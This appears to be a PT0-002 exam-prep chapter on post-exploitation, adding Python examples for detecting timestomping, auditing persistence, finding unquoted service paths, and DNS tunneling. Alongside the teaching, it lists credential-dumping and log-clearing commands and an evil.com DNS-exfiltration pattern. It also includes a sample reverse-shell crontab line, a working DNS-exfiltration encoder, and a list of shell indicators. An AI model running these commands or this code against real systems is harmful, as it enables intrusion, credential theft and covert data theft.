PT0-002 | Chapter 9 of 104 | Objective 3.4

Post-Exploitation Techniques

This chapter covers post-exploitation techniques, a critical phase after initial compromise where attackers establish persistence, escalate privileges, move laterally, and exfiltrate data. For the PT0-002 exam, approximately 15-20% of questions in the 'Attacks and Exploits' domain (Objective 3.4) focus on post-exploitation tactics, including specific tools, commands, and methodologies. Mastery of these concepts is essential for both the multiple-choice and performance-based questions.

Intermediate | 25 min read | Updated May 31, 2026

Post-Exploitation: Burglary After Breaking In

Post-exploitation is like a burglar who has just picked the lock on a back door and entered a large office building. The initial exploit (picking the lock) got them inside, but now they need to achieve their real objective: steal sensitive documents from a locked filing cabinet in the CEO's office on the third floor. First, they make sure they can get back in even if someone fixes the back door, by propping open a fire exit or copying a key (persistence). They map the building: where the cameras are, when the guards patrol, which doors lead where (internal enumeration). They pick additional locks to reach floors their entry point did not give them (privilege escalation), or clone an employee's badge (credential dumping) and use it to walk into other departments (lateral movement). A room that can only be reached through another room is entered by going through that room first (pivoting). They carry the documents out hidden in an ordinary briefcase rather than an armful of folders (exfiltration), and on the way they disable alarms, erase camera footage, and avoid leaving fingerprints (covering tracks and anti-forensics). Every step increases the risk of being caught, so they must act efficiently and quietly. The entire operation after the initial break-in mirrors post-exploitation: once the initial foothold is gained, the attacker must persist, escalate, move laterally, pivot, and exfiltrate while avoiding detection.

How It Actually Works

What is Post-Exploitation?

Post-exploitation refers to the activities performed after an initial compromise (exploitation) has been achieved. The goal is to maintain access, gather intelligence, expand control, and extract valuable data. In penetration testing, this phase simulates what a real attacker would do once inside the network. The PT0-002 exam expects you to understand the key stages: persistence, privilege escalation, lateral movement, credential dumping, pivoting, and exfiltration.

Persistence Mechanisms

Persistence ensures continued access even after reboots or credential changes. Common Windows methods include:
- Scheduled Tasks: using schtasks to launch a reverse shell at logon, at startup, or on a timer.
- Registry Run Keys: adding entries under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run (every boot) or RunOnce (next boot only); the HKEY_CURRENT_USER equivalents need no admin rights but only fire for that user.
- Startup Folders: placing executables in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup.
- Services: installing a service that auto-starts (e.g., sc create with start= auto).
- DLL Hijacking: planting a malicious DLL where a trusted, auto-starting process will load it instead of, or before, the legitimate one.
- Web Shells: uploading a script (e.g., .asp, .php) to a web server that provides remote command execution.

On Linux, common persistence includes:
- SSH Authorized Keys: adding an attacker's public key to ~/.ssh/authorized_keys.
- Cron Jobs: crontab -e to run a payload periodically, or a file dropped into /etc/cron.d/.
- Systemd Services: creating .service files in /etc/systemd/system/ (or ~/.config/systemd/user/ for an unprivileged user).
- .bashrc / .profile: adding reverse shell commands to shell startup scripts, which run at every interactive login.

Privilege Escalation

Privilege escalation is the process of gaining higher-level permissions (e.g., from user to administrator or SYSTEM). It is divided into:
- Vertical Escalation: gaining higher privileges on the same host (e.g., exploiting a local kernel vulnerability or a sudo misconfiguration). Note that EternalBlue (MS17-010) is a remote SMB exploit that yields SYSTEM directly; it is not a local escalation technique.
- Horizontal Escalation: accessing another user's account with similar privileges but different resources (e.g., stealing another user's credentials).

Common techniques include:
- Kernel Exploits: using tools like linux-exploit-suggester or Windows Exploit Suggester to match the kernel or patch level against known local exploits.
- Service Misconfigurations: unquoted service paths, weak permissions on the service or its binary, or modifiable services running as SYSTEM.
- Token Manipulation: duplicating or impersonating access tokens; accounts holding SeImpersonatePrivilege (typically service accounts such as IIS or SQL Server) can be escalated to SYSTEM with JuicyPotato, RottenPotato, or PrintSpoofer.
- DLL Hijacking: placing a malicious DLL in a writable directory where a high-privilege process loads it.
- Sudo/SUID Misconfigurations: on Linux, sudo -l lists commands runnable as root, and find / -perm -4000 2>/dev/null lists SUID binaries, which execute with their owner's privileges (usually root).
- AlwaysInstallElevated: when the AlwaysInstallElevated value is set to 1 under both HKLM and HKCU, any user can install an MSI with SYSTEM privileges.

Lateral Movement

Lateral movement is the technique of moving from one compromised host to another within the same network. Common methods:
- Pass-the-Hash (PtH): authenticating to remote systems with an NTLM hash instead of the plaintext password. Tools: Mimikatz (sekurlsa::pth), Impacket (wmiexec.py, psexec.py), CrackMapExec.
- Pass-the-Ticket (PtT): authenticating with a Kerberos ticket-granting ticket (TGT) or service ticket extracted from memory (Mimikatz sekurlsa::tickets, then kerberos::ptt).
- Remote Desktop Protocol (RDP): using stolen credentials to RDP into other machines.
- PowerShell Remoting: executing commands over WinRM (Enter-PSSession, Invoke-Command).
- SSH: using stolen keys or passwords to log into other Linux hosts, and SSH port forwarding to reach services behind them.
- PsExec: Sysinternals tool that installs a temporary service over SMB to execute processes on remote systems (requires admin credentials).

Credential Dumping

Credential dumping extracts authentication material (hashes, plaintext passwords, tickets) from memory, registry, or disk. Tools:
- Mimikatz: extracts passwords, hashes, PINs, and Kerberos tickets from LSASS memory. Command: sekurlsa::logonpasswords (needs privilege::debug, i.e., local admin or SYSTEM).
- LaZagne: dumps stored passwords from many applications (browsers, mail clients, Wi-Fi profiles, etc.).
- Windows Credential Manager: cmdkey /list and vaultcmd enumerate saved credentials.
- DCSync: a Mimikatz feature (lsadump::dcsync) that mimics a Domain Controller and asks a real DC to replicate the password hashes of any account. It requires the directory replication rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All), which Domain Admins hold by default, and it can run from any domain-joined host.
- Registry Hives: saving the SAM, SYSTEM, and SECURITY hives (e.g., reg save hklm\sam sam.save and reg save hklm\system system.save) and extracting the local hashes offline with Impacket's secretsdump.py.

Pivoting and Tunneling

Pivoting uses a compromised host as a relay to reach otherwise inaccessible networks. Techniques:
- Port Forwarding: ssh -L (local) exposes one remote service on a local port; ssh -R (remote) exposes a local service on the remote side.
- Dynamic Port Forwarding: ssh -D 1080 user@pivot_host creates a SOCKS proxy on local port 1080; every connection sent through it leaves from the pivot host.
- Proxychains: wraps a tool so its TCP connections go through that SOCKS proxy (point /etc/proxychains.conf at 127.0.0.1:1080).
- Metasploit pivot: route add <subnet> <netmask> <session-id> in msfconsole (or run autoroute inside a Meterpreter session) routes framework modules through the session; auxiliary/server/socks_proxy exposes that route as a SOCKS proxy for external tools.
- Chisel: fast TCP/UDP tunnel over HTTP, useful when SSH is not available on the pivot.

Data Exfiltration

Exfiltration is the covert extraction of sensitive data. Methods include:
- Encrypted Channels: HTTPS uploads blend in with normal web traffic and hide the content from inspection.
- Covert Channels: DNS tunneling (encoding data in query names such as <encoded-chunk>.evil.com; tools: dnscat2, iodine) or ICMP payloads, which often pass through firewalls that block other outbound traffic.
- Steganography: hiding data in images or other files.
- Split and Compress: using rar, 7z, or gzip with passwords, then splitting into small chunks to stay under transfer-size alerts.
- Cloud Services: uploading to Google Drive, Dropbox, or AWS S3 via API, since traffic to those domains is rarely blocked.

Covering Tracks

Attackers erase evidence of their activity:
- Log Clearing: wevtutil cl System on Windows; truncate -s0 /var/log/auth.log on Linux.
- Timestomping: changing file timestamps with touch -t on Linux or, in PowerShell, by assigning (Get-Item file).LastWriteTime and (Get-Item file).CreationTime.
- Disabling Logging: stopping audit services or modifying WEF (Windows Event Forwarding) subscriptions so events never reach the collector.
- Anti-Forensics: overwriting free space, deleting prefetch files, and removing registry keys.
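As an added example (not from the original page), the following Python shows why timestomping with touch -t is detectable on Linux and macOS: os.utime rewrites atime and mtime exactly as touch -t does, but the kernel updates the inode change time (ctime) on every metadata write and offers no API to set it, so a file whose mtime is older than its ctime has had its timestamps touched after its last content write. On Windows st_ctime is the creation time, so the same comparison flags the other classic indicator, a file "modified before it was created". The sample file and the one-year backdate are constructed for the demonstration.

```python
import os
import tempfile
import time


def backdate_mtime(path: str, epoch: float) -> None:
    """Do what `touch -t` does: set atime and mtime to an arbitrary time.
    On Linux/macOS the kernel bumps ctime to *now* as a side effect of this call."""
    os.utime(path, (epoch, epoch))


def looks_timestomped(path: str, slack: float = 2.0) -> bool:
    """Heuristic: mtime earlier than ctime by more than `slack` seconds.
    Linux/macOS: ctime is kernel-maintained, so a backdated mtime lags behind it.
    Windows: st_ctime is creation time, so this flags 'modified before created'.
    Benign causes exist (chmod/chown after the last write on Linux, file copies on
    Windows), so treat hits as leads for an inode / $MFT review, not as proof."""
    st = os.stat(path)
    return (st.st_ctime - st.st_mtime) > slack


def scan_tree(root: str, slack: float = 2.0) -> list[str]:
    """Walk a directory and return the files that trip the heuristic."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                if looks_timestomped(full, slack):
                    hits.append(full)
            except OSError:
                continue  # unreadable or vanished between listing and stat; skip
    return hits


def demo() -> dict:
    """Constructed scenario: write a file, then backdate it by a year as an attacker would."""
    with tempfile.TemporaryDirectory() as tmp:
        target = os.path.join(tmp, "notes.txt")
        with open(target, "w") as fh:
            fh.write("constructed sample content\n")
        before = looks_timestomped(target)           # fresh file: ctime == mtime
        backdate_mtime(target, time.time() - 365 * 86400)
        after = looks_timestomped(target)            # mtime a year back, ctime just now
        flagged = scan_tree(tmp)
    return {"before": before, "after": after, "flagged": len(flagged)}


if __name__ == "__main__":
    print(demo())
```

On Linux, stat file prints the three timestamps side by side (the Change line is ctime); touch -t moves Modify but never Change. Windows investigators get the equivalent signal by comparing the $STANDARD_INFORMATION timestamps, which timestomping tools rewrite, against the $FILE_NAME timestamps in the MFT, which they usually cannot.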

Key Tools and Commands for the Exam

Mimikatz: privilege::debug, sekurlsa::logonpasswords, lsadump::dcsync.

Impacket: psexec.py, wmiexec.py, smbexec.py, secretsdump.py.

PowerShell Empire / Starkiller: Post-exploitation agent framework.

CrackMapExec: Swiss army knife for lateral movement (supports SMB, WMI, WinRM, SSH).

BloodHound: Maps Active Directory relationships to find privilege escalation paths.

Netcat / Ncat: For reverse shells and data transfer.

Python one-liners: python -c 'import pty; pty.spawn("/bin/bash")' for shell upgrade.

Interplay with Other Technologies

Post-exploitation often involves:
- Active Directory: BloodHound identifies attack paths; DCSync extracts all domain hashes.
- Firewalls/IDS: pivoting bypasses network segmentation; encrypted tunnels hide payloads from inspection.
- Endpoint Protection: tools like Mimikatz are signatured by AV, so attackers load them in memory, inject into other processes, or downgrade to PowerShell 2.0, which has neither AMSI nor script block logging.
- Cloud Environments: abusing IAM roles, the instance metadata service, and storage buckets for lateral movement.

Exam-Relevant Defaults and Timers

Windows User Account Control (UAC): an administrator's default token is filtered to medium integrity; bypass techniques (e.g., fodhelper, eventvwr auto-elevation) obtain a high-integrity token without a prompt. A UAC bypass is not escalation from a standard user: the account must already be a local administrator.

Kerberos Ticket Lifetime: the default maximum lifetime is 10 hours (600 minutes) for both TGTs and service tickets; a TGT can be renewed for up to 7 days.

LSASS Protection (PPL): Windows 8.1+; Mimikatz may need driver loading (mimidrv) to bypass.

Scheduled Task Triggers: At logon, at startup, or on idle (default 10 minutes idle time).

Walk-Through

1

Establish Persistence

After initial compromise, the attacker ensures continued access by installing a persistent backdoor. On Windows, this often involves adding a registry run key (e.g., `HKLM\Software\Microsoft\Windows\CurrentVersion\Run`) or creating a scheduled task that executes a reverse shell every hour. On Linux, adding an SSH authorized key or a cron job is common. The key is to survive reboots and credential changes. The attacker must also consider detection: registry keys may be monitored by EDR, so they might use WMI event subscriptions or DLL hijacking instead. The exam expects you to know specific persistence locations and how to verify them (e.g., `reg query` or `schtasks /query`).
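Verifying persistence locations is where most of the work is, for the tester documenting what was planted and for the defender hunting for it. The Python below is an added example, not from the original page: it audits a crontab listing and an authorized_keys file, the two Linux locations named above, flagging reverse-shell indicators, @reboot entries, keys whose OpenSSH SHA256 fingerprint is not in an approved inventory, and keys carrying a forced command. The indicator list, the key blobs (built in OpenSSH wire format from a hash, not real keys), the inventory and the sample files are all constructed for the demonstration.

```python
import base64
import hashlib
import re
from dataclasses import dataclass

# Indicators typical of reverse shells and download cradles (an assumed, non-exhaustive list).
SHELL_INDICATORS = [
    (r"/dev/tcp/", "bash /dev/tcp reverse shell"),
    (r"\b(nc|ncat|netcat)\b.*\s(-e|--exec)\s", "netcat -e/--exec reverse shell"),
    (r"\bmkfifo\b", "named-pipe shell"),
    (r"base64\s+(-d|--decode)", "base64-decoded payload"),
    (r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", "download-and-execute cradle"),
    (r"import\s+socket|pty\.spawn", "python socket/pty shell"),
]

# authorized_keys line: [options] <type> <base64 blob> [comment]
KEY_LINE = re.compile(
    r"^(?P<opts>.*?)\s*(?P<type>ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp(?:256|384|521)|sk-\S+)"
    r"\s+(?P<b64>[A-Za-z0-9+/=]+)(?:\s+(?P<comment>.*))?$")


@dataclass
class Finding:
    source: str
    line_no: int
    reason: str
    entry: str


def audit_crontab(text: str, source: str = "crontab") -> list[Finding]:
    """Flag crontab entries that match a shell indicator or that run at every boot."""
    out = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Z_]+=", line):
            continue  # blank, comment, or environment assignment
        reason = next((why for pat, why in SHELL_INDICATORS if re.search(pat, line)), None)
        if reason is None and line.startswith("@reboot"):
            reason = "runs at every boot; confirm it is expected"
        if reason:
            out.append(Finding(source, n, reason, line))
    return out


def ssh_fingerprint(b64_blob: str) -> str:
    """OpenSSH SHA256 fingerprint: sha256 of the decoded blob, base64 without padding."""
    digest = hashlib.sha256(base64.b64decode(b64_blob)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def audit_authorized_keys(text: str, inventory: set[str], source: str = "authorized_keys") -> list[Finding]:
    """Flag keys not in the approved inventory and keys with a forced command
    (command= is a favourite way to hide a backdoor behind an innocent-looking key)."""
    out = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = KEY_LINE.match(line)
        if not m:
            out.append(Finding(source, n, "unparseable entry", line))
            continue
        fp = ssh_fingerprint(m["b64"])
        if fp not in inventory:
            out.append(Finding(source, n, f"key not in inventory: {fp}", line))
        if "command=" in m["opts"]:
            out.append(Finding(source, n, "forced command set on key", line))
    return out


def _fake_ed25519_blob(seed: bytes) -> str:
    """Constructed blob in OpenSSH wire format (string 'ssh-ed25519' + 32 bytes); not a real key."""
    blob = b"\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x20" + hashlib.sha256(seed).digest()
    return base64.b64encode(blob).decode()


GOOD_KEY = _fake_ed25519_blob(b"admin-laptop")
ROGUE_KEY = _fake_ed25519_blob(b"attacker")
INVENTORY = {ssh_fingerprint(GOOD_KEY)}          # fingerprints of keys the team actually issued

SAMPLE_CRONTAB = """\
# m h dom mon dow command
PATH=/usr/local/bin:/usr/bin:/bin
0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'
@reboot /opt/agent/agent --daemon
"""
SAMPLE_AUTHORIZED_KEYS = f"""\
ssh-ed25519 {GOOD_KEY} admin@laptop
command="/bin/true" ssh-ed25519 {ROGUE_KEY} backup
"""


def run_audit() -> list[Finding]:
    return audit_crontab(SAMPLE_CRONTAB) + audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, INVENTORY)


if __name__ == "__main__":
    for f in run_audit():
        print(f"{f.source}:{f.line_no}: {f.reason}\n    {f.entry}")
```

Feed it live data by passing the text of crontab -l, /etc/crontab and /etc/cron.d/*, and ~/.ssh/authorized_keys; the inventory is the set of fingerprints ssh-keygen -lf prints for keys your team issued. The Windows equivalents are the outputs of reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run and schtasks /query /fo csv /v, which take the same indicator-matching treatment.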

2

Escalate Privileges

With a foothold, the attacker seeks higher privileges (e.g., Administrator or SYSTEM). Common techniques include exploiting kernel vulnerabilities (e.g., CVE-2021-1732 on Windows) or abusing service misconfigurations like unquoted service paths. The attacker uses tools like `whoami /priv` to list available privileges and `accesschk.exe` to check service permissions. If `SeImpersonatePrivilege` is enabled, tools like JuicyPotato can escalate to SYSTEM. On Linux, `sudo -l` shows allowed commands; a misconfigured sudoers entry for `find` or `vim` can grant root. The exam often tests the difference between vertical and horizontal escalation.
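To make the unquoted service path case concrete, here is an added Python example (not from the original page) that reproduces the Windows search behaviour: for an unquoted ImagePath containing spaces, CreateProcess tries each space-delimited prefix with .exe appended before it reaches the real binary, so an attacker who can write to any directory on that chain drops a binary there and waits for the SYSTEM service to restart. The service table and the set of writable directories are constructed stand-ins for sc qc / wmic service get name,pathname output and an icacls or accesschk.exe -uwdq check.

```python
import ntpath
import re
from dataclasses import dataclass


@dataclass
class Hijack:
    service: str
    drop_path: str      # executable an attacker would plant
    writable_dir: str   # directory that makes the plant possible


def search_candidates(image_path: str) -> list[str]:
    """Executables Windows tries, in order, for an unquoted ImagePath with spaces.
    C:\\Program Files\\My App\\svc.exe yields C:\\Program.exe, C:\\Program Files\\My.exe,
    then the real binary. Quoted paths and paths without spaces are safe and return []."""
    path = image_path.strip()
    if path.startswith('"'):
        return []
    m = re.match(r"(?i)(.*?\.exe)(?:\s|$)", path)      # drop service arguments after the binary
    exe = m.group(1) if m else path
    if " " not in exe:
        return []
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))] + [exe]


def find_hijackable(services: dict[str, str], writable_dirs: set[str]) -> list[Hijack]:
    """Cross the candidate paths with directories the current user can write to."""
    norm = {d.rstrip("\\").lower() for d in writable_dirs}
    hits = []
    for name, image in services.items():
        for cand in search_candidates(image)[:-1]:     # last entry is the legitimate binary
            parent = ntpath.dirname(cand)
            if parent.rstrip("\\").lower() in norm:
                hits.append(Hijack(name, cand, parent))
    return hits


# Constructed ImagePath values, as `sc qc <name>` would report them.
SAMPLE_SERVICES = {
    "VulnSvc":  r"C:\Program Files\Vuln Corp\Agent Service\vulnsvc.exe -service",
    "SafeSvc":  r'"C:\Program Files\Safe Corp\safesvc.exe" -service',
    "NoSpaces": r"C:\Windows\System32\svchost.exe -k netsvcs",
}
# Constructed ACL result: the vendor left its own folder writable by Users.
WRITABLE = {r"C:\Program Files\Vuln Corp", r"C:\Users\Public"}


if __name__ == "__main__":
    for svc, image in SAMPLE_SERVICES.items():
        print(svc, "->", search_candidates(image))
    for h in find_hijackable(SAMPLE_SERVICES, WRITABLE):
        print(f"{h.service}: plant {h.drop_path} (writable: {h.writable_dir})")
```

Two things the code makes explicit: C:\Program.exe is almost never usable because standard users cannot create files in the root of the system drive, so the exploitable link is usually a vendor directory with loose ACLs; and having a drop location is not enough, the service must restart, which needs SERVICE_START rights (sc start VulnSvc) or a reboot. The fix is to quote the path, for example sc config VulnSvc binPath= "\"C:\Program Files\Vuln Corp\Agent Service\vulnsvc.exe\" -service", and to remove write access for Users on the directory.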

3

Dump Credentials

Once elevated, the attacker extracts credentials from memory or disk. Mimikatz is the go-to tool: after enabling `privilege::debug`, running `sekurlsa::logonpasswords` dumps NTLM hashes (and plaintext passwords where WDigest is still enabled) from LSASS. Alternatively, `reg save hklm\sam sam.save` and `reg save hklm\system system.save` export the hives needed to extract the local hashes offline. With an account holding replication rights, DCSync (`lsadump::dcsync /user:krbtgt`) pulls an account's hash from a Domain Controller over the network; it runs from any domain-joined host and never touches the DC's disk. The attacker may also dump browser passwords using LaZagne. Credential dumping is noisy and often triggers AV or EDR (handle access to lsass.exe is a standard detection), so attackers may use reflective DLL injection to load Mimikatz in memory.

4

Move Laterally

With valid credentials, the attacker moves to other hosts. Pass-the-Hash uses NTLM hashes to authenticate via SMB or WMI without knowing the plaintext password. Tools like `psexec.py` from Impacket or `wmiexec.py` execute commands remotely. The attacker discovers hosts with `net view`, DNS queries (`nslookup`), or BloodHound, which on domain networks maps trust and admin relationships to identify target machines. Two conditions matter for the exam: the target must be reachable on an NTLM-capable service (SMB, WMI, WinRM), and the account whose hash you hold must have admin rights there. For a local account that usually means a shared local admin password across machines (common in poorly managed environments); for a domain account it means membership in the target's local Administrators group.

5

Pivot to Other Networks

The compromised host may be dual-homed or have access to a restricted subnet. The attacker sets up a SOCKS proxy using `ssh -D 1080 user@pivot` or Metasploit's `route add` plus the socks_proxy module. Then, tools like `proxychains` route traffic through the proxy. For example, `proxychains nmap -sT -Pn 10.0.0.0/24` scans the internal network; only TCP connect scans (`-sT`) fit through a SOCKS proxy, and `-Pn` skips the ICMP/ARP host discovery that cannot traverse it. Pivoting often requires careful configuration of routing tables and may involve double-hop tunnels. The exam may ask about the difference between local port forwarding (`-L`), which exposes one fixed remote service, and dynamic port forwarding (`-D`), which provides a general-purpose SOCKS proxy.
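What `ssh -D 1080` hands to proxychains is a SOCKS5 listener, and seeing the exchange explains the -sT -Pn requirement. This added Python example (not from the original page) builds the client greeting and CONNECT request, parses the proxy's reply, and includes a toy proxy function standing in for the SSH pivot so both sides of the exchange are visible offline; the set of hosts it treats as reachable is constructed. The request bytes shown are what every tool wrapped by proxychains emits for each new connection.

```python
import socket
import struct

SOCKS5 = 0x05
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN = 0x01, 0x03
REPLY_TEXT = {
    0x00: "succeeded", 0x01: "general SOCKS server failure", 0x02: "connection not allowed by ruleset",
    0x03: "network unreachable", 0x04: "host unreachable", 0x05: "connection refused",
    0x06: "TTL expired", 0x07: "command not supported", 0x08: "address type not supported",
}


def client_greeting() -> bytes:
    """VER=5, NMETHODS=1, METHODS=[0x00 no authentication], which is what ssh -D offers."""
    return bytes([SOCKS5, 0x01, 0x00])


def parse_method_selection(data: bytes) -> None:
    if len(data) != 2 or data[0] != SOCKS5:
        raise ValueError("not a SOCKS5 method selection")
    if data[1] == 0xFF:
        raise ConnectionError("proxy accepts none of the offered auth methods")


def connect_request(host: str, port: int) -> bytes:
    """CONNECT to host:port. An IPv4 literal uses ATYP 1; anything else is sent as a domain name
    (ATYP 3) so the *proxy* resolves it from inside the network, which is what proxychains'
    proxy_dns setting relies on: the attacker's local resolver knows nothing about internal names."""
    try:
        addr = bytes([ATYP_IPV4]) + socket.inet_aton(host)
    except OSError:
        name = host.encode("idna")
        if len(name) > 255:
            raise ValueError("hostname too long for SOCKS5")
        addr = bytes([ATYP_DOMAIN, len(name)]) + name
    return bytes([SOCKS5, CMD_CONNECT, 0x00]) + addr + struct.pack(">H", port)


def parse_request(data: bytes) -> tuple[str, int]:
    """Proxy side: decode the CONNECT target."""
    ver, cmd, _rsv, atyp = data[:4]
    if ver != SOCKS5 or cmd != CMD_CONNECT:
        raise ValueError("unsupported request")
    if atyp == ATYP_IPV4:
        host, rest = socket.inet_ntoa(data[4:8]), data[8:]
    elif atyp == ATYP_DOMAIN:
        n = data[4]
        host, rest = data[5:5 + n].decode("idna"), data[5 + n:]
    else:
        raise ValueError("address type not handled in this example")
    return host, struct.unpack(">H", rest[:2])[0]


def reply(code: int, bound_ip: str = "0.0.0.0", bound_port: int = 0) -> bytes:
    return bytes([SOCKS5, code, 0x00, ATYP_IPV4]) + socket.inet_aton(bound_ip) + struct.pack(">H", bound_port)


def parse_reply(data: bytes) -> tuple[int, str]:
    ver, code, _rsv, atyp = data[:4]
    if ver != SOCKS5 or atyp != ATYP_IPV4:
        raise ValueError("unexpected reply format")
    return code, REPLY_TEXT.get(code, "unknown")


# Toy stand-in for the pivot: the (host, port) pairs it can reach are constructed.
REACHABLE = {("10.0.0.5", 445), ("10.0.0.5", 3389), ("dc01.corp.local", 88)}


def toy_proxy(request: bytes) -> bytes:
    """What the SSH pivot does per CONNECT: try the TCP connect from its side, report the outcome."""
    host, port = parse_request(request)
    return reply(0x00) if (host, port) in REACHABLE else reply(0x05)


def tunnel(host: str, port: int) -> tuple[int, str]:
    """Full client/proxy exchange for one connection, as proxychains performs it per socket."""
    parse_method_selection(bytes([SOCKS5, 0x00]))          # proxy picked 'no auth'
    return parse_reply(toy_proxy(connect_request(host, port)))


if __name__ == "__main__":
    print(client_greeting().hex(), connect_request("10.0.0.5", 445).hex())
    print(tunnel("10.0.0.5", 445), tunnel("10.0.0.9", 22), tunnel("dc01.corp.local", 88))
```

Every probe through the proxy is a complete TCP connect made by the pivot, which is why nmap must use -sT: SYN scans and pings need raw sockets on the attacker's box and never enter the tunnel. UDP is not carried either, so UDP services behind the pivot need a different tunnel such as Chisel.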

6

Exfiltrate Data

The final step is extracting valuable data. To avoid detection, the attacker encrypts data (e.g., `gpg -c file`) and exfiltrates via HTTPS (looks like normal traffic) or DNS tunneling (splits data into DNS queries). Tools like `dnscat2` create a C2 channel over DNS. Alternatively, data can be uploaded to cloud storage using APIs. The attacker may split large files into chunks (e.g., `split -b 10M file`) and send over multiple sessions. The exam tests knowledge of exfiltration channels and how to detect them (e.g., unusual DNS query sizes).
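As an added example (not from the original page) of both the exfiltration step above and the DNS-tunneling entry in the Data Exfiltration section, the Python below splits a payload into base32-encoded labels that respect the 63-byte label and 253-byte name limits, prefixes each query with a sequence number, reassembles the data on the receiving side, and then runs the detection heuristic the text mentions over a constructed query log: many unique, long, high-entropy subdomains under one registered domain. The payload, the tunnel domain and the benign queries are constructed; the "registered domain = last two labels" rule is an assumption that ignores public suffixes such as co.uk.

```python
import base64
import collections
import math
import random

MAX_LABEL = 63
MAX_NAME = 253
BYTES_PER_LABEL = 35       # base32 turns 35 bytes into 56 characters, under the 63-char label limit
LABELS_PER_QUERY = 3       # 105 payload bytes per query keeps the whole name well under 253


def _b32(chunk: bytes) -> str:
    return base64.b32encode(chunk).decode().rstrip("=").lower()    # DNS is case-insensitive


def _unb32(label: str) -> bytes:
    s = label.upper()
    return base64.b32decode(s + "=" * (-len(s) % 8))


def encode_queries(data: bytes, domain: str) -> list[str]:
    """Sender side: <seq>.<label>[.<label>...].<domain>, one query per 105-byte slice."""
    per_query = BYTES_PER_LABEL * LABELS_PER_QUERY
    queries = []
    for seq, off in enumerate(range(0, len(data), per_query)):
        piece = data[off:off + per_query]
        labels = [_b32(piece[i:i + BYTES_PER_LABEL]) for i in range(0, len(piece), BYTES_PER_LABEL)]
        name = ".".join([f"{seq:04x}", *labels, domain])
        if len(name) > MAX_NAME or any(len(l) > MAX_LABEL for l in name.split(".")):
            raise ValueError("query would violate DNS name limits")
        queries.append(name)
    return queries


def decode_queries(queries: list[str], domain: str) -> bytes:
    """Receiver side (the authoritative server for `domain`): reorder by sequence number,
    collapse duplicates caused by resolver retries, and decode."""
    pieces = {}
    suffix = "." + domain
    for q in queries:
        if not q.endswith(suffix):
            continue
        seq_label, *labels = q[:-len(suffix)].split(".")
        pieces[int(seq_label, 16)] = b"".join(_unb32(l) for l in labels)
    return b"".join(pieces[k] for k in sorted(pieces))


def _entropy(s: str) -> float:
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in collections.Counter(s).values()) if n else 0.0


def flag_tunnel_domains(query_log, min_queries=20, min_avg_len=40, min_entropy=3.5) -> dict:
    """Detection: per registered domain, count unique names and score the average subdomain
    length and character entropy. Real sites repeat a handful of short names; a tunnel emits a
    stream of long, never-repeating, high-entropy ones."""
    by_domain = collections.defaultdict(set)
    for q in query_log:
        parts = q.lower().rstrip(".").split(".")
        by_domain[".".join(parts[-2:])].add(".".join(parts))
    flagged = {}
    for dom, names in by_domain.items():
        if len(names) < min_queries:
            continue
        subs = [n[:-len(dom) - 1].replace(".", "") for n in names]
        avg_len = sum(map(len, subs)) / len(subs)
        avg_ent = sum(map(_entropy, subs)) / len(subs)
        if avg_len >= min_avg_len and avg_ent >= min_entropy:
            flagged[dom] = {"unique_queries": len(names), "avg_len": round(avg_len, 1),
                            "avg_entropy": round(avg_ent, 2)}
    return flagged


# Constructed traffic: a 3 KB pseudo-random payload (stands in for an encrypted archive) sent
# through tun.example.org, mixed with ordinary lookups of example.com.
PAYLOAD = random.Random(7).randbytes(3000)
TUNNEL_DOMAIN = "tun.example.org"
BENIGN = ["www.example.com", "mail.example.com", "cdn.example.com", "www.example.com"] * 10


def run_demo() -> dict:
    tunnel_queries = encode_queries(PAYLOAD, TUNNEL_DOMAIN)
    recovered = decode_queries(tunnel_queries + BENIGN, TUNNEL_DOMAIN)
    flagged = flag_tunnel_domains(tunnel_queries + BENIGN)
    return {"queries": len(tunnel_queries), "roundtrip_ok": recovered == PAYLOAD, "flagged": flagged}


if __name__ == "__main__":
    print(run_demo())
```

dnscat2 and iodine work on the same principle with encryption and flow control added. On the defensive side the heuristic maps straight onto a resolver or firewall query log, with thresholds tuned per environment; a second signal worth adding is the NXDOMAIN rate per domain, since a tunnel server answers with records the client never uses.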

What This Looks Like on the Job

In a typical enterprise penetration test, the post-exploitation phase begins after the tester gains initial access via a phishing email or web application vulnerability. For example, a tester might compromise a workstation in the sales department. The first step is to establish persistence by adding a scheduled task that calls back to a C2 server every 30 minutes. This ensures that even if the user logs off, access is retained. Next, the tester runs whoami /groups to check domain group memberships. If the user is a local administrator, they can dump credentials using Mimikatz. Often, the same local admin password is reused across many workstations, allowing pass-the-hash to dozens of machines using CrackMapExec. The tester then pivots to a server that has SQL Server installed with sysadmin privileges. From there, they can access the database and exfiltrate customer PII.

In another scenario, a cloud-based penetration test (e.g., AWS) involves compromising an EC2 instance via an exposed SSH key. Post-exploitation includes reading the instance metadata service (http://169.254.169.254/latest/meta-data/iam/security-credentials/) to retrieve the temporary credentials of the instance's IAM role; where IMDSv2 is enforced, the request must first obtain a session token with a PUT to http://169.254.169.254/latest/api/token and present it in the X-aws-ec2-metadata-token header. With those credentials, the tester can enumerate S3 buckets, launch new instances, or move laterally to other services. Persistence is achieved by creating a new IAM user or access key, or by modifying a Lambda function to call back to an external server. Exfiltration is often done via S3 cross-region replication into an attacker-controlled bucket or by uploading data to a bucket in the attacker's account.

